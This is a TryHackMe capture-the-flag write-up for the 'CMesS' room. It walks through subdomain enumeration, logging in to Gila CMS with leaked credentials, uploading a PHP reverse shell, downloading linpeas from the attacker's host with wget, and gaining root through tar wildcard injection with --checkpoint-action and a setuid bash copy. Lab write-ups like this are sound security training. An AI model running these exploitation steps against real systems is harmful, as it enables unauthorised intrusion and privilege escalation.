CMesS — TryHackMe

CMesS — TryHackMe

This is a really great medium-level box that involves enumerating subdomains and discovering sensitive information on /dev, including the email and password for the Gila CMS admin user. Utilizing these credentials, one can log in via /login. Once inside, you have the ability to upload a php reverse shell, granting us a foothold into the system. From this point, we located the user password in a backup file under /opt. Through further system enumeration, we elevated our privileges and rooted the box using wildcard injection.
Room

Enumeration:

First we're going to do an initial scan with Nmap to start looking for all ports on the target machine.

sudo nmap -p- --min-rate=5000 -oG CMess 10.10.204.141 --vv

Searching the file CMess to look ports that are open

grep -oP '([\d]+/open)' CMess | awk -F / '{ print $1 }' | tr '\n' ','

Upon our scan we encountered two port that are open one 22 ssh port and the other port 80 http port. The command above it's pretty useful if you've a lot of ports open on the target machine.

└──╼ $nmap -sVC -p "22,80" -T4 10.10.204.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-05 17:09 EST
Nmap scan report for 10.10.204.141
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9b652d3939a3850b4233bfd210c051f (RSA)
|   256 21c36e318b85228a6d72868fae64662b (ECDSA)
|_  256 5bb9757805d7ec43309617ffc6a86ced (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

Adding the domain name to the /etc/hosts file.

$echo "10.10.204.141 cmess.thm" | sudo tee -a /etc/hosts
[sudo] password for user: 
10.10.204.141 cmess.thm

Navigating to the website we can see it's Gila CMS an open source content management system, We can do a vulnerability scan on this to check if we can get known public vulnerabilities.

I used searchsploit tool and also did it on google search.

Upon we doing so we found several vulnerabilities but they're not gonna work simply because XSS vulnerability can't get us a shell on the machine considering that there's no user interaction and the other like LFI SQLi vulnerabilities require admin authentication which we don't have the credentials for it lasty the RCE didn't work.

Consequently we did is running the gobuster to check for directories and files on the target.

gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We got tons of webpages, most of them useless except /login and /admin, but we need credentials in order to log in to the account as an admin or a user.

Next thing we are going to enumerate subdomains.

wfuzz -c -w top1million.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hl 107
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000019:   200        30 L     104 W      934 Ch      "dev"

Adding again the subdomain to the /etc/hosts file.

echo "10.10.69.214 dev.cmess.thm" | sudo tee -a /etc/hosts

We exposed the development log that contains sensitive information. We can try to login to ssh with the password but it didn't work. we used this credentials to login as admin via /admin and it works.

The credentials that we used:
andre@cmess.thm KPFTN_f2yxe%

Now we're in the dashboard however there's a lot going on here we can start test for things.

Foothold

Go to content then file manager as you observe we've the ability to upload file on the sever. this will give as chance to upload php reverse shell and get RCE on the sever.

Before we do that we need to make some adjustment on the reverse shell. If your using ParrotOS the file is found on this path /usr/share/webshells/php/php-reverse-shell.php.

Then upload the php file, once you uploaded it you can navigate to the assets folder and run the reverse shell by clicking on the file that you've uploaded it.

Make sure you have a listener up and running!
Boom we got a shell on the box, and we can get the user flag.

For more interacting with terminal it's better to upgrade the shell or stabilizing it so you can do the basic things that the terminal support like crl+c or clear command or maybe navigating with arrow keys.

This will accomplish two things first it will turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell.

This will give us access to term commands such as clear.

Privilege Escalation:

So far this is one the most challenging privesc that I have encountered it's required a good enumeration to get this one done. It's kind of tricky how we're going to perform it, Before we go a head, first we need to download the linpeas on the target machine.

ww-data@cmess:/tmp$ wget http://10.11.46.4:8000/linpeas.sh -O linpeas.sh
--2023-12-08 21:53:06--  http://10.11.46.4:8000/linpeas.sh
Connecting to 10.11.46.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847773 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 827.90K  94.2KB/s    in 6.0s    

2023-12-08 21:53:12 (137 KB/s) - 'linpeas.sh' saved [847773/847773]

www-data@cmess:/tmp$ chmod +x linpeas.sh
www-data@cmess:/tmp$ ./linpeas.sh

Running linpeas we discovered the password was hidden in /opt directory under the file .password.bak and then we used it against the andre user. And also, linpeas highlighted a cron job which we'll go after that.

As you can see, the password is 'UQfsdCB7aAP6' and we executed the awk command to filter the stored user information in the system file /etc/passwd. Upon inspection, we identified a user named Andre, indicating that the recently discovered password may belong to him.

Indeed we successfully managed to compromise his account, and the user flag stored in a user.txt file.

Now, if you ran linpeas you'll immediately see a cron job highlighted in red that's schedule tar command to run every two minutes as root and backing up all files and directories on the backup directory to /tmp folder.

andre@cmess:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

There's a command injection on the wildcard so we can inject our script ( that'd be a reverse shell or any malicious file that we have created) as a command to run as root by tar since tar run as root user and presumably give as shell that we can interact with, we can leverage this by using the options.

If you check the manual page for tar you'll see the following:

-checkpoint[=N] Display progress messages every Nth record (default 10).
--checkpoint-action=ACTION Run ACTION on each checkpoint.

This option will allow as to run the malicious file that we created, hence --checkpoint-action=ACTION will be used as an option by tar command when it'll be running at it's hits the time specified by cron.

andre@cmess:/tmp$ cd /home/andre/backup
andre@cmess:~/backup$ cat note 
Note to self.
Anything in here will be backed up! 
shdre@cmess:~/backup$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > shell.sh 
andre@cmess:~/backup$ chmod +x runme.sh 
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint=1
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint-action=exec=sh\ shell.sh
Copy

Wait about 2 minutes and check the /tmp folder and you will eventually get root shell